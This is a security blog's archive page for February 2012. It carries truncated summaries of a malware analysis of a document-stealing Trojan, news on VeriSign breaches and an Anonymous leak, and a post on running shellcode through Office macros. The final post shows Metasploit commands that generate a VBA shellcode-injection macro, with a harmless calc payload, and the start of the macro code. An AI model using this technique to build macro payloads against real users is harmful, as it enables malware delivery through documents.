Posts

Showing posts from February, 2012

Trojan Abuses Sendspace: A Closer Look

Trojan Abuses Sendspace: A Closer Look : We recently discovered a Trojan that harvested documents on affected systems and uploaded them to the file hosting site, sendspace.com. This post will discuss more of our findings on the said attack. In order to infect users, emails disguised as a shipment notification from FedEx were mass-mailed to target victims. This email contains a downloader Trojan which installs TSPY_SPCESEND.A. This downloader also installs other malicious executables on affected systems, including FAKEAV variants from the BestAV affiliate network and FakeHDD variants from the Yamba network. These were observed to be downloaded from compromised, legitimate websites. Furthermore, this downloader Trojan also shares the same C&C as TSPY_SPCESEND.A. This strongly suggests that the document-stealing sendspace Trojan is pushed by cybercriminals who are also involved in the Pay-Per-Sell (PPS) underground business. Command and Control Server After the malware uploa...

VeriSign Hit by Hackers in 2010

VeriSign Hit by Hackers in 2010 : Photo: a_sorense/Flickr. Internet giant VeriSign was hacked repeatedly in 2010, resulting in the theft of undisclosed information and raising questions about the integrity of security certificates issued by the company as well as its domain name service. The breaches were disclosed in vague language in a Securities and Exchange Commission filing last October, in accordance with new SEC guidelines requiring companies to report intrusions to investors, according to Reuters. The filing doesn't say when in 2010 the breaches occurred, but administrators didn't alert top management until September 2011, although the document indicates administrators were aware of, and responded to, the breaches shortly after they occurred in 2010. The company's former chief technology officer, Ken Silva, who was with VeriSign until November 2010, was unaware of the breaches until Reuters contacted him for its story. VeriSign told Reuters the company did "not believe these a...

Anonymous leaks FBI conference call on hacking investigations

Anonymous leaks FBI conference call on hacking investigations : Anonymous resumed today its F**k FBI Friday campaign by publishing a 16-minute-long mp3 recording of a confidential conference call between representatives of the FBI and Scotland Yard. The subjec...

Direct Shellcode Execution via MS Office Macros with Metasploit

Direct Shellcode Execution via MS Office Macros with Metasploit : scriptjunkie recently had a post on Direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate macro code is in the post, but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba

#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas...